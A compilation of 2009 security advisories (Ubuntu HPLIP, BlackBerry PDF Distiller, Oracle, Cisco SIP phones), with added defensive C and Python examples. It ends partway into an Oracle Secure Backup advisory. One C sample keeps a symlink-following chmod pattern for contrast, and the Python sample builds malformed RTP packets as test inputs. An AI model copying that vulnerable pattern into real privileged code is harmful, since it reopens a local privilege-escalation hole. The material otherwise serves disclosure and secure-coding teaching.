
===========================================================
Ubuntu Security Notice USN-708-1           January 13, 2009
hplip vulnerability
https://launchpad.net/bugs/191299
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  hplip                           2.7.7.dfsg.1-0ubuntu5.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that an installation script in the HPLIP package would
change permissions on the hplip config files located in users' home directories.
A local user could exploit this and change permissions on arbitrary files
upon an HPLIP installation or upgrade, which could lead to root privileges.


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.diff.gz
      Size/MD5:   149462 e8b5cb18aff082738bfcfe069eb873f5
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.dsc
      Size/MD5:     1064 531e707f0cbace5f1eb82039e409c306
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1.orig.tar.gz
      Size/MD5: 14361049 ae5165d46413db8119979f5b3345f7a5

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:  6898006 691895b0f8e5fc93bcb86d47d11da1af
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:  4146918 d4e0b928aacc84bbe2a05862050a5963
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:   117628 91f0c9d09f2520e76b3a3e6cde4abd63
    http://security.ubuntu.com/ubuntu/pool/universe/h/hplip/hpijs-ppds_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:   480134 59604754cef89d7b5ae128ecf20f44da

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   341576 918813fb4741326051c7480ffeae9a9a
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   770122 ccef78fc8a55b4e94318931964e9e97b
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   302856 f2a47e27a69aa016334a1ffdac105be1

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   334690 dd891b2df494fd1fbc46abd25b9ef7db
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   747250 4676694a4d20445e64f3f4dc91aaa44c
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   290282 921463222e2b642fb5bc16083d8b70ac

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   337798 9c060add246bb5212706b9dd0d92cc51
    http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   926096 af4481ea010212486ea621103329cf13
    http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   290082 f26b9fc31e3457719b3102b3a9c77b5b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   348258 66f9714865cad898e10e98ef83f6e443
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   784504 0c76dac215474fc62900aea547168387
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   319006 52d13211d1681fe90b74951dc204a788

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   332756 a3411ca114399f0359b949462e0313ab
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   717210 401d1050417a9a8608198088abb9e305
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   289370 f92c0c0f6a2f2ccef18d3874db728bf7
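
Added example, not part of the Ubuntu notice or the HPLIP package: the class of bug described under "Details" above, shown as a path-based permission change beside a descriptor-based one. The notice does not say how the path is redirected; this sketch assumes a symbolic or hard link, and the function names and scratch paths are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Risky pattern, kept for contrast: chmod(2) resolves symbolic links, so a
 * privileged caller changes whatever the user-controlled path points at. */
static int fix_mode_by_path(const char *path, mode_t mode)
{
    return chmod(path, mode) == 0 ? 0 : -errno;
}

/* Hardened form: bind to one object with open(O_NOFOLLOW), verify that
 * object through the descriptor, then fchmod() the same descriptor.
 * Returns 0 on success or a negative errno value. */
static int fix_mode_checked(const char *path, uid_t owner, mode_t mode)
{
    struct stat st;
    int rc = 0;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);

    if (fd < 0)
        return -errno;          /* last component is a symlink, or missing */
    if (fstat(fd, &st) != 0)
        rc = -errno;
    else if (!S_ISREG(st.st_mode))
        rc = -EINVAL;           /* device, FIFO, directory: not a config file */
    else if (st.st_uid != owner)
        rc = -EPERM;            /* not owned by the expected user */
    else if (st.st_nlink != 1)
        rc = -EMLINK;           /* a hard link could alias another file */
    else if (fchmod(fd, mode) != 0)
        rc = -errno;
    close(fd);
    return rc;
}

/* Constructed scenario in a scratch directory. "hplip.conf" is either a
 * regular file or a symlink to "target". Returns the fixer's result and
 * stores the resulting mode bits of the file that "hplip.conf" names. */
static int run_scenario(int as_symlink, int hardened, mode_t *mode_after)
{
    char dir[] = "/tmp/permfix-XXXXXX";
    char target[64], conf[64];
    struct stat st;
    int rc, fd;

    if (mkdtemp(dir) == NULL)
        return -errno;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(conf, sizeof conf, "%s/hplip.conf", dir);

    fd = open(as_symlink ? target : conf, O_CREAT | O_EXCL | O_WRONLY, 0600);
    if (fd < 0)
        return -errno;
    close(fd);
    if (as_symlink && symlink(target, conf) != 0)
        return -errno;

    rc = hardened ? fix_mode_checked(conf, geteuid(), 0644)
                  : fix_mode_by_path(conf, 0644);

    if (stat(conf, &st) != 0)   /* stat() follows the link on purpose */
        return -errno;
    *mode_after = st.st_mode & 0777;

    unlink(conf);
    unlink(target);             /* absent in the regular-file case */
    rmdir(dir);
    return rc;
}

int main(void)
{
    mode_t m = 0;
    int rc = run_scenario(1, 0, &m);
    printf("by path, symlink : rc=%d target mode=%04o\n", rc, (unsigned)m);
    rc = run_scenario(1, 1, &m);
    printf("checked, symlink : rc=%d target mode=%04o\n", rc, (unsigned)m);
    rc = run_scenario(0, 1, &m);
    printf("checked, regular : rc=%d file mode=%04o\n", rc, (unsigned)m);
    return 0;
}
```

O_NOFOLLOW only guards the last path component; where the user also controls parent directories, resolve from a trusted directory descriptor with openat() or do the work with the user's own privileges.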




Message-ID: <496D00F3.5020603@idefense.com>
Date: Tue, 13 Jan 2009 16:00:35 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller 'bitmaps' Heap Overflow Vulnerability

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In
Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an
attacker to execute arbitrary code with the privileges of the affected
service, usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. During parsing, a dynamic array is filled up with pointers to
certain objects without properly checking to see whether the array is
large enough to hold all of the pointers. By inserting a large number
of pointers, it is possible to overflow the array, and corrupt object
pointers. This can lead to the EIP register being controlled, which
results in the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must e-mail an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

In Labs testing, it was possible to gain code execution, albeit
unreliably. It is likely that with additional heap sculpting reliable
code execution is possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

Message-ID: <496D08F6.7050700@idefense.com>
Date: Tue, 13 Jan 2009 16:34:46 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller Uninitialized Memory Vulnerability

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of an uninitialized memory vulnerability in Research
In Motion Ltd.'s BlackBerry Enterprise Server could allow an attacker to
execute arbitrary code with the privileges of the affected service,
which is usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. Due to a logic error, it is possible to allocate an array of
object pointers that is never initialized. This array is located on the
heap. When the object that contains this array is destroyed, each
pointer in the array is deleted. Since the memory is never properly
initialized, whatever content was previously there is used. It is
possible to control the chunk of memory that gets allocated for this
array, which can lead to attacker-controlled values being used as
object pointers. This results in the execution of arbitrary code when
these pointers are deleted.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must email an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

Labs testing has demonstrated that this vulnerability is highly
exploitable. It is possible to lay out the heap in such a way that a
previously allocated chunk of fully controllable memory is reused for
the uninitialized memory block. Code execution is then gained when this
memory is used as an array of object pointers.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
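
Added example, not from iDefense or RIM: a heap array of object pointers written so that neither defect described in the two PDF Distiller advisories above can occur. Appends check capacity before writing, the array is zero-filled at allocation, and teardown releases only slots that were filled. The type names, the 4096-entry limit and the load_stream() driver are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OBJ_TABLE_MAX 4096u          /* assumed per-stream policy limit */

typedef struct { int id; } pdf_obj;  /* hypothetical stand-in for a parsed object */

typedef struct {
    pdf_obj **slots;                 /* heap array of object pointers */
    size_t    used;                  /* slots[0 .. used) hold owned pointers */
    size_t    cap;                   /* number of slots allocated */
} obj_table;

/* Allocate the array zero-filled so no slot ever holds stale heap content. */
static int obj_table_init(obj_table *t, size_t cap)
{
    memset(t, 0, sizeof *t);
    if (cap == 0 || cap > OBJ_TABLE_MAX)
        return -1;
    t->slots = calloc(cap, sizeof *t->slots);
    if (t->slots == NULL)
        return -1;
    t->cap = cap;
    return 0;
}

/* Append one pointer. The capacity check comes before the write; growth is
 * capped, and a full table at the cap rejects the input. */
static int obj_table_push(obj_table *t, pdf_obj *o)
{
    if (t->used == t->cap) {
        size_t ncap = t->cap * 2 > OBJ_TABLE_MAX ? OBJ_TABLE_MAX : t->cap * 2;
        pdf_obj **grown;

        if (ncap <= t->cap)
            return -1;               /* at the limit: refuse, never write past */
        grown = realloc(t->slots, ncap * sizeof *grown);
        if (grown == NULL)
            return -1;
        memset(grown + t->cap, 0, (ncap - t->cap) * sizeof *grown);
        t->slots = grown;
        t->cap = ncap;
    }
    t->slots[t->used++] = o;
    return 0;
}

/* Release only the slots that were filled; returns how many were freed. */
static size_t obj_table_destroy(obj_table *t)
{
    size_t freed = t->used;

    for (size_t i = 0; i < t->used; i++)
        free(t->slots[i]);
    free(t->slots);
    memset(t, 0, sizeof *t);
    return freed;
}

/* Constructed driver: a stream declares `declared` objects but carries
 * `actual` of them. Returns the number stored, or -1 if the table refused. */
static long load_stream(obj_table *t, size_t declared, size_t actual)
{
    if (obj_table_init(t, declared) != 0)
        return -1;
    for (size_t i = 0; i < actual; i++) {
        pdf_obj *o = malloc(sizeof *o);

        if (o != NULL)
            o->id = (int)i;
        if (o == NULL || obj_table_push(t, o) != 0) {
            free(o);
            return -1;
        }
    }
    return (long)t->used;
}

int main(void)
{
    obj_table t;

    /* More entries than declared: the table grows instead of overflowing. */
    printf("stored=%ld cap=%zu\n", load_stream(&t, 4, 10), t.cap);
    printf("freed=%zu\n", obj_table_destroy(&t));

    /* Allocated but never filled: teardown touches no slot. */
    printf("stored=%ld\n", load_stream(&t, 8, 0));
    printf("freed=%zu\n", obj_table_destroy(&t));
    return 0;
}
```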

Message-ID: <496D1762.8090707@idefense.com>
Date: Tue, 13 Jan 2009 17:36:18 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary
 Advisor Arbitrary File Rewrite Vulnerability

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

Oracle Database Server is a family of database products that range from
personal databases to enterprise solutions. Further information is
available at the following URL:

http://www.oracle.com/database/index.html

II. DESCRIPTION

Local exploitation of an arbitrary file rewrite vulnerability in Oracle
Corp.'s Oracle Database 10g Release 2 database product allows attackers
to gain elevated privileges.

The vulnerability exists in a function that allows a user with an
authenticated session to create any file or rewrite any files to which
the database account has access.

III. ANALYSIS

Successful exploitation allows the attacker to gain database account
privilege. On Linux and Unix systems the database account is usually
'oracle' while on Windows systems it is the 'SYSTEM' account. To
exploit this vulnerability, the attacker must create a session and
execute the privileged procedure.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Oracle
Database 10g Release 2 version 10.2.0.3.0 on 32-bit Linux platform and
Windows platform. Previous versions may also be affected. Oracle
Database 11g Release 1 version 11.1.0.6.0 is not affected by this
vulnerability.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3997 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/24/2008  - Initial Vendor Notification
03/25/2008  - Initial Vendor Response
11/24/2008  - Status update from Vendor
01/12/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Code Audit Labs
(http://vulnhunt.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

Message-ID: <496DDAAC.8070605@orange-ftgroup.com>
Date: Wed, 14 Jan 2009 13:29:32 +0100
From: Laurent Butti <laurent.butti@orange-ftgroup.com>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability

Title:
------
* Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability

Summary:
--------
* The Cisco Unified IP Phone 7960G and 7940G (SIP) do not correctly
parse some malformed RTP headers leading to a deterministic denial of
service

Assigned CVE:
-------------
* CVE-2008-4444

Details:
--------
* SIP protocol is used to set up calls between phones. Once the call is
established, the media content is carried by the RTP protocol. A remote
attacker could send a specially crafted RTP packet against a Cisco SIP
phone in such a way as to cause the phone to reboot.

Attack Impact:
--------------
* Denial-of-service (reboot or hang-up) and possibly remote arbitrary
code execution

Attack Vector:
--------------
* Have the possibility to setup a call to the targeted phone and carry
RTP frame to the vulnerable device
* Have access to the VoIP network while a call is established and inject
RTP frames

Timeline:
---------
* 2008-06-13 - Vulnerability reported to Cisco
* 2008-06-16 - Full details sent to Cisco
* 2008-10-21 - Cisco released a patched firmware
* 2009-01-14 - Release of this security advisory

Affected Products:
------------------
* Cisco Unified IP Phone 7960G and 7940G (SIP) with P0S3-08-9-00
firmware. Cisco released a patched firmware on October 21, 2008 which is
described in the bug identifier CSCsu22285 (Cisco Unified IP Phone 7960G
and 7940G (SIP) Release Notes for Firmware Release 8.10).

Credits:
--------
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange
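
The advisory does not say which RTP header field the phones mishandle. As an added illustration (not code from the advisory or from Cisco), this Python parser applies the length checks a receiver needs before trusting the CSRC count, extension length and padding count defined in RFC 3550; the helper names and sample datagrams are constructed for the example.

```python
import struct

RTP_FIXED_LEN = 12  # fixed header size, RFC 3550 section 5.1


class RtpError(ValueError):
    """The datagram is not a well-formed RTP version 2 packet."""


def parse_rtp(datagram: bytes) -> dict:
    """Parse one RTP packet, bounding every length field by the datagram size."""
    total = len(datagram)
    if total < RTP_FIXED_LEN:
        raise RtpError("shorter than the 12-byte fixed header")
    b0, b1, seq, timestamp, ssrc = struct.unpack("!BBHII", datagram[:RTP_FIXED_LEN])
    if b0 >> 6 != 2:
        raise RtpError("version is not 2")
    has_padding = bool(b0 & 0x20)
    has_ext = bool(b0 & 0x10)
    csrc_count = b0 & 0x0F

    # CC comes from the sender: the 0..15 CSRC words it announces must be present.
    offset = RTP_FIXED_LEN + 4 * csrc_count
    if offset > total:
        raise RtpError("CSRC count runs past the end of the datagram")
    csrcs = list(struct.unpack("!%dI" % csrc_count, datagram[RTP_FIXED_LEN:offset]))

    extension = None
    if has_ext:
        # Extension header: 16-bit profile id, 16-bit length in 32-bit words.
        if offset + 4 > total:
            raise RtpError("extension header truncated")
        profile, words = struct.unpack("!HH", datagram[offset:offset + 4])
        offset += 4
        if offset + 4 * words > total:
            raise RtpError("extension length runs past the end of the datagram")
        extension = (profile, datagram[offset:offset + 4 * words])
        offset += 4 * words

    end = total
    if has_padding:
        # The last octet counts the padding octets, itself included.
        if end == offset:
            raise RtpError("padding flag set on an empty payload")
        pad = datagram[-1]
        if pad == 0 or pad > end - offset:
            raise RtpError("padding count exceeds the payload")
        end -= pad

    return {
        "marker": bool(b1 & 0x80),
        "payload_type": b1 & 0x7F,
        "sequence": seq,
        "timestamp": timestamp,
        "ssrc": ssrc,
        "csrcs": csrcs,
        "extension": extension,
        "payload": datagram[offset:end],
    }


def classify(datagram: bytes) -> str:
    """Return "ok" or the reason the datagram was rejected."""
    try:
        parse_rtp(datagram)
        return "ok"
    except RtpError as exc:
        return str(exc)


def header(b0, b1=0, seq=1, ts=160, ssrc=0x11223344):
    """Build a 12-byte fixed header for the constructed samples below."""
    return struct.pack("!BBHII", b0, b1, seq, ts, ssrc)


# Constructed datagrams: one well-formed, four with inconsistent length fields.
SAMPLES = {
    "valid": header(0x80) + b"\xd5" * 8,
    "csrc_overrun": header(0x8F),
    "ext_overrun": header(0x90) + struct.pack("!HH", 0xBEDE, 0xFFFF),
    "pad_overrun": header(0xA0) + b"\x00\xc8",
    "short": b"\x80\x00\x00",
}

if __name__ == "__main__":
    for name, packet in SAMPLES.items():
        print(name, "->", classify(packet))
```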

From - Wed Jan 14 12:02:17 2009
Message-ID: <496D1E43.8000603@idefense.com>
Date: Tue, 13 Jan 2009 18:05:39 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Corp.'s Secure Backup is tape backup management software. For
more information, please visit the following website:
http://www.oracle.com/technology/products/secure-backup/index.html

II. DESCRIPTION

